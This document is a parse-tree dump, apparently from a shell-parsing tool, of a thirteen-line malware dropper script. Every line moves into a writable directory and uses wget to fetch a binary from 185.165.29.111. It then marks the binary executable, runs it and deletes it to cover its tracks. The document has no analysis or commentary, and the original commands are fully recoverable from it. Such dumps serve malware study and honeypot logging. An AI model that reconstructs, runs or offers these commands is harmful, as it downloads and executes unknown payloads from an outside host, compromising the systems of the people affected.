ListNode(lineno=2, pos=(12, 130), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 97), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 97), word='http://185.165.29.111/mba'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(97, 98)),
  CommandNode(lineno=2, pos=(99, 111), parts=[
    WordNode(lineno=2, pos=(99, 104), word='chmod'),
    WordNode(lineno=2, pos=(105, 107), word='+x'),
    WordNode(lineno=2, pos=(108, 111), word='mba'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(111, 112)),
  CommandNode(lineno=2, pos=(113, 118), parts=[
    WordNode(lineno=2, pos=(113, 118), word='./mba'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(118, 119)),
  CommandNode(lineno=2, pos=(120, 130), parts=[
    WordNode(lineno=2, pos=(120, 122), word='rm'),
    WordNode(lineno=2, pos=(123, 126), word='-rf'),
    WordNode(lineno=2, pos=(127, 130), word='mba'),
  ]),
])
ListNode(lineno=3, pos=(131, 249), parts=[
  CommandNode(lineno=3, pos=(131, 138), parts=[
    WordNode(lineno=3, pos=(131, 133), word='cd'),
    WordNode(lineno=3, pos=(134, 138), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(139, 141)),
  CommandNode(lineno=3, pos=(142, 153), parts=[
    WordNode(lineno=3, pos=(142, 144), word='cd'),
    WordNode(lineno=3, pos=(145, 153), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(154, 156)),
  CommandNode(lineno=3, pos=(157, 164), parts=[
    WordNode(lineno=3, pos=(157, 159), word='cd'),
    WordNode(lineno=3, pos=(160, 164), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(165, 167)),
  CommandNode(lineno=3, pos=(168, 176), parts=[
    WordNode(lineno=3, pos=(168, 170), word='cd'),
    WordNode(lineno=3, pos=(171, 176), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(177, 179)),
  CommandNode(lineno=3, pos=(180, 184), parts=[
    WordNode(lineno=3, pos=(180, 182), word='cd'),
    WordNode(lineno=3, pos=(183, 184), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(184, 185)),
  CommandNode(lineno=3, pos=(186, 216), parts=[
    WordNode(lineno=3, pos=(186, 190), word='wget'),
    WordNode(lineno=3, pos=(191, 216), word='http://185.165.29.111/ebs'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(216, 217)),
  CommandNode(lineno=3, pos=(218, 230), parts=[
    WordNode(lineno=3, pos=(218, 223), word='chmod'),
    WordNode(lineno=3, pos=(224, 226), word='+x'),
    WordNode(lineno=3, pos=(227, 230), word='ebs'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(230, 231)),
  CommandNode(lineno=3, pos=(232, 237), parts=[
    WordNode(lineno=3, pos=(232, 237), word='./ebs'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(237, 238)),
  CommandNode(lineno=3, pos=(239, 249), parts=[
    WordNode(lineno=3, pos=(239, 241), word='rm'),
    WordNode(lineno=3, pos=(242, 245), word='-rf'),
    WordNode(lineno=3, pos=(246, 249), word='ebs'),
  ]),
])
ListNode(lineno=4, pos=(250, 364), parts=[
  CommandNode(lineno=4, pos=(250, 257), parts=[
    WordNode(lineno=4, pos=(250, 252), word='cd'),
    WordNode(lineno=4, pos=(253, 257), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(258, 260)),
  CommandNode(lineno=4, pos=(261, 272), parts=[
    WordNode(lineno=4, pos=(261, 263), word='cd'),
    WordNode(lineno=4, pos=(264, 272), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(273, 275)),
  CommandNode(lineno=4, pos=(276, 283), parts=[
    WordNode(lineno=4, pos=(276, 278), word='cd'),
    WordNode(lineno=4, pos=(279, 283), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(284, 286)),
  CommandNode(lineno=4, pos=(287, 295), parts=[
    WordNode(lineno=4, pos=(287, 289), word='cd'),
    WordNode(lineno=4, pos=(290, 295), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(296, 298)),
  CommandNode(lineno=4, pos=(299, 303), parts=[
    WordNode(lineno=4, pos=(299, 301), word='cd'),
    WordNode(lineno=4, pos=(302, 303), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(303, 304)),
  CommandNode(lineno=4, pos=(305, 334), parts=[
    WordNode(lineno=4, pos=(305, 309), word='wget'),
    WordNode(lineno=4, pos=(310, 334), word='http://185.165.29.111/ew'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(334, 335)),
  CommandNode(lineno=4, pos=(336, 347), parts=[
    WordNode(lineno=4, pos=(336, 341), word='chmod'),
    WordNode(lineno=4, pos=(342, 344), word='+x'),
    WordNode(lineno=4, pos=(345, 347), word='ew'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(347, 348)),
  CommandNode(lineno=4, pos=(349, 353), parts=[
    WordNode(lineno=4, pos=(349, 353), word='./ew'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(353, 354)),
  CommandNode(lineno=4, pos=(355, 364), parts=[
    WordNode(lineno=4, pos=(355, 357), word='rm'),
    WordNode(lineno=4, pos=(358, 361), word='-rf'),
    WordNode(lineno=4, pos=(362, 364), word='ew'),
  ]),
])
ListNode(lineno=5, pos=(365, 479), parts=[
  CommandNode(lineno=5, pos=(365, 372), parts=[
    WordNode(lineno=5, pos=(365, 367), word='cd'),
    WordNode(lineno=5, pos=(368, 372), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(373, 375)),
  CommandNode(lineno=5, pos=(376, 387), parts=[
    WordNode(lineno=5, pos=(376, 378), word='cd'),
    WordNode(lineno=5, pos=(379, 387), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(388, 390)),
  CommandNode(lineno=5, pos=(391, 398), parts=[
    WordNode(lineno=5, pos=(391, 393), word='cd'),
    WordNode(lineno=5, pos=(394, 398), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(399, 401)),
  CommandNode(lineno=5, pos=(402, 410), parts=[
    WordNode(lineno=5, pos=(402, 404), word='cd'),
    WordNode(lineno=5, pos=(405, 410), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(411, 413)),
  CommandNode(lineno=5, pos=(414, 418), parts=[
    WordNode(lineno=5, pos=(414, 416), word='cd'),
    WordNode(lineno=5, pos=(417, 418), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(418, 419)),
  CommandNode(lineno=5, pos=(420, 449), parts=[
    WordNode(lineno=5, pos=(420, 424), word='wget'),
    WordNode(lineno=5, pos=(425, 449), word='http://185.165.29.111/aw'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(449, 450)),
  CommandNode(lineno=5, pos=(451, 462), parts=[
    WordNode(lineno=5, pos=(451, 456), word='chmod'),
    WordNode(lineno=5, pos=(457, 459), word='+x'),
    WordNode(lineno=5, pos=(460, 462), word='aw'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(462, 463)),
  CommandNode(lineno=5, pos=(464, 468), parts=[
    WordNode(lineno=5, pos=(464, 468), word='./aw'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(468, 469)),
  CommandNode(lineno=5, pos=(470, 479), parts=[
    WordNode(lineno=5, pos=(470, 472), word='rm'),
    WordNode(lineno=5, pos=(473, 476), word='-rf'),
    WordNode(lineno=5, pos=(477, 479), word='aw'),
  ]),
])
ListNode(lineno=6, pos=(480, 598), parts=[
  CommandNode(lineno=6, pos=(480, 487), parts=[
    WordNode(lineno=6, pos=(480, 482), word='cd'),
    WordNode(lineno=6, pos=(483, 487), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(488, 490)),
  CommandNode(lineno=6, pos=(491, 502), parts=[
    WordNode(lineno=6, pos=(491, 493), word='cd'),
    WordNode(lineno=6, pos=(494, 502), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(503, 505)),
  CommandNode(lineno=6, pos=(506, 513), parts=[
    WordNode(lineno=6, pos=(506, 508), word='cd'),
    WordNode(lineno=6, pos=(509, 513), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(514, 516)),
  CommandNode(lineno=6, pos=(517, 525), parts=[
    WordNode(lineno=6, pos=(517, 519), word='cd'),
    WordNode(lineno=6, pos=(520, 525), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(526, 528)),
  CommandNode(lineno=6, pos=(529, 533), parts=[
    WordNode(lineno=6, pos=(529, 531), word='cd'),
    WordNode(lineno=6, pos=(532, 533), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(533, 534)),
  CommandNode(lineno=6, pos=(535, 565), parts=[
    WordNode(lineno=6, pos=(535, 539), word='wget'),
    WordNode(lineno=6, pos=(540, 565), word='http://185.165.29.111/ftr'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(565, 566)),
  CommandNode(lineno=6, pos=(567, 579), parts=[
    WordNode(lineno=6, pos=(567, 572), word='chmod'),
    WordNode(lineno=6, pos=(573, 575), word='+x'),
    WordNode(lineno=6, pos=(576, 579), word='ftr'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(579, 580)),
  CommandNode(lineno=6, pos=(581, 586), parts=[
    WordNode(lineno=6, pos=(581, 586), word='./ftr'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(586, 587)),
  CommandNode(lineno=6, pos=(588, 598), parts=[
    WordNode(lineno=6, pos=(588, 590), word='rm'),
    WordNode(lineno=6, pos=(591, 594), word='-rf'),
    WordNode(lineno=6, pos=(595, 598), word='ftr'),
  ]),
])
ListNode(lineno=7, pos=(599, 713), parts=[
  CommandNode(lineno=7, pos=(599, 606), parts=[
    WordNode(lineno=7, pos=(599, 601), word='cd'),
    WordNode(lineno=7, pos=(602, 606), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(607, 609)),
  CommandNode(lineno=7, pos=(610, 621), parts=[
    WordNode(lineno=7, pos=(610, 612), word='cd'),
    WordNode(lineno=7, pos=(613, 621), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(622, 624)),
  CommandNode(lineno=7, pos=(625, 632), parts=[
    WordNode(lineno=7, pos=(625, 627), word='cd'),
    WordNode(lineno=7, pos=(628, 632), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(633, 635)),
  CommandNode(lineno=7, pos=(636, 644), parts=[
    WordNode(lineno=7, pos=(636, 638), word='cd'),
    WordNode(lineno=7, pos=(639, 644), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(645, 647)),
  CommandNode(lineno=7, pos=(648, 652), parts=[
    WordNode(lineno=7, pos=(648, 650), word='cd'),
    WordNode(lineno=7, pos=(651, 652), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(652, 653)),
  CommandNode(lineno=7, pos=(654, 683), parts=[
    WordNode(lineno=7, pos=(654, 658), word='wget'),
    WordNode(lineno=7, pos=(659, 683), word='http://185.165.29.111/er'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(683, 684)),
  CommandNode(lineno=7, pos=(685, 696), parts=[
    WordNode(lineno=7, pos=(685, 690), word='chmod'),
    WordNode(lineno=7, pos=(691, 693), word='+x'),
    WordNode(lineno=7, pos=(694, 696), word='er'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(696, 697)),
  CommandNode(lineno=7, pos=(698, 702), parts=[
    WordNode(lineno=7, pos=(698, 702), word='./er'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(702, 703)),
  CommandNode(lineno=7, pos=(704, 713), parts=[
    WordNode(lineno=7, pos=(704, 706), word='rm'),
    WordNode(lineno=7, pos=(707, 710), word='-rf'),
    WordNode(lineno=7, pos=(711, 713), word='er'),
  ]),
])
ListNode(lineno=8, pos=(714, 828), parts=[
  CommandNode(lineno=8, pos=(714, 721), parts=[
    WordNode(lineno=8, pos=(714, 716), word='cd'),
    WordNode(lineno=8, pos=(717, 721), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(722, 724)),
  CommandNode(lineno=8, pos=(725, 736), parts=[
    WordNode(lineno=8, pos=(725, 727), word='cd'),
    WordNode(lineno=8, pos=(728, 736), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(737, 739)),
  CommandNode(lineno=8, pos=(740, 747), parts=[
    WordNode(lineno=8, pos=(740, 742), word='cd'),
    WordNode(lineno=8, pos=(743, 747), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(748, 750)),
  CommandNode(lineno=8, pos=(751, 759), parts=[
    WordNode(lineno=8, pos=(751, 753), word='cd'),
    WordNode(lineno=8, pos=(754, 759), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(760, 762)),
  CommandNode(lineno=8, pos=(763, 767), parts=[
    WordNode(lineno=8, pos=(763, 765), word='cd'),
    WordNode(lineno=8, pos=(766, 767), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(767, 768)),
  CommandNode(lineno=8, pos=(769, 798), parts=[
    WordNode(lineno=8, pos=(769, 773), word='wget'),
    WordNode(lineno=8, pos=(774, 798), word='http://185.165.29.111/re'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(798, 799)),
  CommandNode(lineno=8, pos=(800, 811), parts=[
    WordNode(lineno=8, pos=(800, 805), word='chmod'),
    WordNode(lineno=8, pos=(806, 808), word='+x'),
    WordNode(lineno=8, pos=(809, 811), word='re'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(811, 812)),
  CommandNode(lineno=8, pos=(813, 817), parts=[
    WordNode(lineno=8, pos=(813, 817), word='./re'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(817, 818)),
  CommandNode(lineno=8, pos=(819, 828), parts=[
    WordNode(lineno=8, pos=(819, 821), word='rm'),
    WordNode(lineno=8, pos=(822, 825), word='-rf'),
    WordNode(lineno=8, pos=(826, 828), word='re'),
  ]),
])
ListNode(lineno=9, pos=(829, 943), parts=[
  CommandNode(lineno=9, pos=(829, 836), parts=[
    WordNode(lineno=9, pos=(829, 831), word='cd'),
    WordNode(lineno=9, pos=(832, 836), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(837, 839)),
  CommandNode(lineno=9, pos=(840, 851), parts=[
    WordNode(lineno=9, pos=(840, 842), word='cd'),
    WordNode(lineno=9, pos=(843, 851), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(852, 854)),
  CommandNode(lineno=9, pos=(855, 862), parts=[
    WordNode(lineno=9, pos=(855, 857), word='cd'),
    WordNode(lineno=9, pos=(858, 862), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(863, 865)),
  CommandNode(lineno=9, pos=(866, 874), parts=[
    WordNode(lineno=9, pos=(866, 868), word='cd'),
    WordNode(lineno=9, pos=(869, 874), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(875, 877)),
  CommandNode(lineno=9, pos=(878, 882), parts=[
    WordNode(lineno=9, pos=(878, 880), word='cd'),
    WordNode(lineno=9, pos=(881, 882), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(882, 883)),
  CommandNode(lineno=9, pos=(884, 913), parts=[
    WordNode(lineno=9, pos=(884, 888), word='wget'),
    WordNode(lineno=9, pos=(889, 913), word='http://185.165.29.111/ty'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(913, 914)),
  CommandNode(lineno=9, pos=(915, 926), parts=[
    WordNode(lineno=9, pos=(915, 920), word='chmod'),
    WordNode(lineno=9, pos=(921, 923), word='+x'),
    WordNode(lineno=9, pos=(924, 926), word='ty'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(926, 927)),
  CommandNode(lineno=9, pos=(928, 932), parts=[
    WordNode(lineno=9, pos=(928, 932), word='./ty'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(932, 933)),
  CommandNode(lineno=9, pos=(934, 943), parts=[
    WordNode(lineno=9, pos=(934, 936), word='rm'),
    WordNode(lineno=9, pos=(937, 940), word='-rf'),
    WordNode(lineno=9, pos=(941, 943), word='ty'),
  ]),
])
ListNode(lineno=10, pos=(944, 1058), parts=[
  CommandNode(lineno=10, pos=(944, 951), parts=[
    WordNode(lineno=10, pos=(944, 946), word='cd'),
    WordNode(lineno=10, pos=(947, 951), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(952, 954)),
  CommandNode(lineno=10, pos=(955, 966), parts=[
    WordNode(lineno=10, pos=(955, 957), word='cd'),
    WordNode(lineno=10, pos=(958, 966), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(967, 969)),
  CommandNode(lineno=10, pos=(970, 977), parts=[
    WordNode(lineno=10, pos=(970, 972), word='cd'),
    WordNode(lineno=10, pos=(973, 977), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(978, 980)),
  CommandNode(lineno=10, pos=(981, 989), parts=[
    WordNode(lineno=10, pos=(981, 983), word='cd'),
    WordNode(lineno=10, pos=(984, 989), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(990, 992)),
  CommandNode(lineno=10, pos=(993, 997), parts=[
    WordNode(lineno=10, pos=(993, 995), word='cd'),
    WordNode(lineno=10, pos=(996, 997), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(997, 998)),
  CommandNode(lineno=10, pos=(999, 1028), parts=[
    WordNode(lineno=10, pos=(999, 1003), word='wget'),
    WordNode(lineno=10, pos=(1004, 1028), word='http://185.165.29.111/ke'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1028, 1029)),
  CommandNode(lineno=10, pos=(1030, 1041), parts=[
    WordNode(lineno=10, pos=(1030, 1035), word='chmod'),
    WordNode(lineno=10, pos=(1036, 1038), word='+x'),
    WordNode(lineno=10, pos=(1039, 1041), word='ke'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1041, 1042)),
  CommandNode(lineno=10, pos=(1043, 1047), parts=[
    WordNode(lineno=10, pos=(1043, 1047), word='./ke'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1047, 1048)),
  CommandNode(lineno=10, pos=(1049, 1058), parts=[
    WordNode(lineno=10, pos=(1049, 1051), word='rm'),
    WordNode(lineno=10, pos=(1052, 1055), word='-rf'),
    WordNode(lineno=10, pos=(1056, 1058), word='ke'),
  ]),
])
ListNode(lineno=11, pos=(1059, 1173), parts=[
  CommandNode(lineno=11, pos=(1059, 1066), parts=[
    WordNode(lineno=11, pos=(1059, 1061), word='cd'),
    WordNode(lineno=11, pos=(1062, 1066), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1067, 1069)),
  CommandNode(lineno=11, pos=(1070, 1081), parts=[
    WordNode(lineno=11, pos=(1070, 1072), word='cd'),
    WordNode(lineno=11, pos=(1073, 1081), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1082, 1084)),
  CommandNode(lineno=11, pos=(1085, 1092), parts=[
    WordNode(lineno=11, pos=(1085, 1087), word='cd'),
    WordNode(lineno=11, pos=(1088, 1092), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1093, 1095)),
  CommandNode(lineno=11, pos=(1096, 1104), parts=[
    WordNode(lineno=11, pos=(1096, 1098), word='cd'),
    WordNode(lineno=11, pos=(1099, 1104), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1105, 1107)),
  CommandNode(lineno=11, pos=(1108, 1112), parts=[
    WordNode(lineno=11, pos=(1108, 1110), word='cd'),
    WordNode(lineno=11, pos=(1111, 1112), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1112, 1113)),
  CommandNode(lineno=11, pos=(1114, 1143), parts=[
    WordNode(lineno=11, pos=(1114, 1118), word='wget'),
    WordNode(lineno=11, pos=(1119, 1143), word='http://185.165.29.111/as'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1143, 1144)),
  CommandNode(lineno=11, pos=(1145, 1156), parts=[
    WordNode(lineno=11, pos=(1145, 1150), word='chmod'),
    WordNode(lineno=11, pos=(1151, 1153), word='+x'),
    WordNode(lineno=11, pos=(1154, 1156), word='as'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1156, 1157)),
  CommandNode(lineno=11, pos=(1158, 1162), parts=[
    WordNode(lineno=11, pos=(1158, 1162), word='./as'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1162, 1163)),
  CommandNode(lineno=11, pos=(1164, 1173), parts=[
    WordNode(lineno=11, pos=(1164, 1166), word='rm'),
    WordNode(lineno=11, pos=(1167, 1170), word='-rf'),
    WordNode(lineno=11, pos=(1171, 1173), word='as'),
  ]),
])
ListNode(lineno=12, pos=(1174, 1288), parts=[
  CommandNode(lineno=12, pos=(1174, 1181), parts=[
    WordNode(lineno=12, pos=(1174, 1176), word='cd'),
    WordNode(lineno=12, pos=(1177, 1181), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1182, 1184)),
  CommandNode(lineno=12, pos=(1185, 1196), parts=[
    WordNode(lineno=12, pos=(1185, 1187), word='cd'),
    WordNode(lineno=12, pos=(1188, 1196), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1197, 1199)),
  CommandNode(lineno=12, pos=(1200, 1207), parts=[
    WordNode(lineno=12, pos=(1200, 1202), word='cd'),
    WordNode(lineno=12, pos=(1203, 1207), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1208, 1210)),
  CommandNode(lineno=12, pos=(1211, 1219), parts=[
    WordNode(lineno=12, pos=(1211, 1213), word='cd'),
    WordNode(lineno=12, pos=(1214, 1219), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1220, 1222)),
  CommandNode(lineno=12, pos=(1223, 1227), parts=[
    WordNode(lineno=12, pos=(1223, 1225), word='cd'),
    WordNode(lineno=12, pos=(1226, 1227), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1227, 1228)),
  CommandNode(lineno=12, pos=(1229, 1258), parts=[
    WordNode(lineno=12, pos=(1229, 1233), word='wget'),
    WordNode(lineno=12, pos=(1234, 1258), word='http://185.165.29.111/fg'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1258, 1259)),
  CommandNode(lineno=12, pos=(1260, 1271), parts=[
    WordNode(lineno=12, pos=(1260, 1265), word='chmod'),
    WordNode(lineno=12, pos=(1266, 1268), word='+x'),
    WordNode(lineno=12, pos=(1269, 1271), word='fg'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1271, 1272)),
  CommandNode(lineno=12, pos=(1273, 1277), parts=[
    WordNode(lineno=12, pos=(1273, 1277), word='./fg'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1277, 1278)),
  CommandNode(lineno=12, pos=(1279, 1288), parts=[
    WordNode(lineno=12, pos=(1279, 1281), word='rm'),
    WordNode(lineno=12, pos=(1282, 1285), word='-rf'),
    WordNode(lineno=12, pos=(1286, 1288), word='fg'),
  ]),
])
ListNode(lineno=13, pos=(1289, 1411), parts=[
  CommandNode(lineno=13, pos=(1289, 1296), parts=[
    WordNode(lineno=13, pos=(1289, 1291), word='cd'),
    WordNode(lineno=13, pos=(1292, 1296), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1297, 1299)),
  CommandNode(lineno=13, pos=(1300, 1311), parts=[
    WordNode(lineno=13, pos=(1300, 1302), word='cd'),
    WordNode(lineno=13, pos=(1303, 1311), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1312, 1314)),
  CommandNode(lineno=13, pos=(1315, 1322), parts=[
    WordNode(lineno=13, pos=(1315, 1317), word='cd'),
    WordNode(lineno=13, pos=(1318, 1322), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1323, 1325)),
  CommandNode(lineno=13, pos=(1326, 1334), parts=[
    WordNode(lineno=13, pos=(1326, 1328), word='cd'),
    WordNode(lineno=13, pos=(1329, 1334), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1335, 1337)),
  CommandNode(lineno=13, pos=(1338, 1342), parts=[
    WordNode(lineno=13, pos=(1338, 1340), word='cd'),
    WordNode(lineno=13, pos=(1341, 1342), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1342, 1343)),
  CommandNode(lineno=13, pos=(1344, 1375), parts=[
    WordNode(lineno=13, pos=(1344, 1348), word='wget'),
    WordNode(lineno=13, pos=(1349, 1375), word='http://185.165.29.111/sddf'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1375, 1376)),
  CommandNode(lineno=13, pos=(1377, 1390), parts=[
    WordNode(lineno=13, pos=(1377, 1382), word='chmod'),
    WordNode(lineno=13, pos=(1383, 1385), word='+x'),
    WordNode(lineno=13, pos=(1386, 1390), word='sddf'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1390, 1391)),
  CommandNode(lineno=13, pos=(1392, 1398), parts=[
    WordNode(lineno=13, pos=(1392, 1398), word='./sddf'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1398, 1399)),
  CommandNode(lineno=13, pos=(1400, 1411), parts=[
    WordNode(lineno=13, pos=(1400, 1402), word='rm'),
    WordNode(lineno=13, pos=(1403, 1406), word='-rf'),
    WordNode(lineno=13, pos=(1407, 1411), word='sddf'),
  ]),
])
ListNode(lineno=14, pos=(1412, 1530), parts=[
  CommandNode(lineno=14, pos=(1412, 1419), parts=[
    WordNode(lineno=14, pos=(1412, 1414), word='cd'),
    WordNode(lineno=14, pos=(1415, 1419), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1420, 1422)),
  CommandNode(lineno=14, pos=(1423, 1434), parts=[
    WordNode(lineno=14, pos=(1423, 1425), word='cd'),
    WordNode(lineno=14, pos=(1426, 1434), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1435, 1437)),
  CommandNode(lineno=14, pos=(1438, 1445), parts=[
    WordNode(lineno=14, pos=(1438, 1440), word='cd'),
    WordNode(lineno=14, pos=(1441, 1445), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1446, 1448)),
  CommandNode(lineno=14, pos=(1449, 1457), parts=[
    WordNode(lineno=14, pos=(1449, 1451), word='cd'),
    WordNode(lineno=14, pos=(1452, 1457), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1458, 1460)),
  CommandNode(lineno=14, pos=(1461, 1465), parts=[
    WordNode(lineno=14, pos=(1461, 1463), word='cd'),
    WordNode(lineno=14, pos=(1464, 1465), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1465, 1466)),
  CommandNode(lineno=14, pos=(1467, 1497), parts=[
    WordNode(lineno=14, pos=(1467, 1471), word='wget'),
    WordNode(lineno=14, pos=(1472, 1497), word='http://185.165.29.111/tel'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1497, 1498)),
  CommandNode(lineno=14, pos=(1499, 1511), parts=[
    WordNode(lineno=14, pos=(1499, 1504), word='chmod'),
    WordNode(lineno=14, pos=(1505, 1507), word='+x'),
    WordNode(lineno=14, pos=(1508, 1511), word='tel'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1511, 1512)),
  CommandNode(lineno=14, pos=(1513, 1518), parts=[
    WordNode(lineno=14, pos=(1513, 1518), word='./tel'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1518, 1519)),
  CommandNode(lineno=14, pos=(1520, 1530), parts=[
    WordNode(lineno=14, pos=(1520, 1522), word='rm'),
    WordNode(lineno=14, pos=(1523, 1526), word='-rf'),
    WordNode(lineno=14, pos=(1527, 1530), word='tel'),
  ]),
])
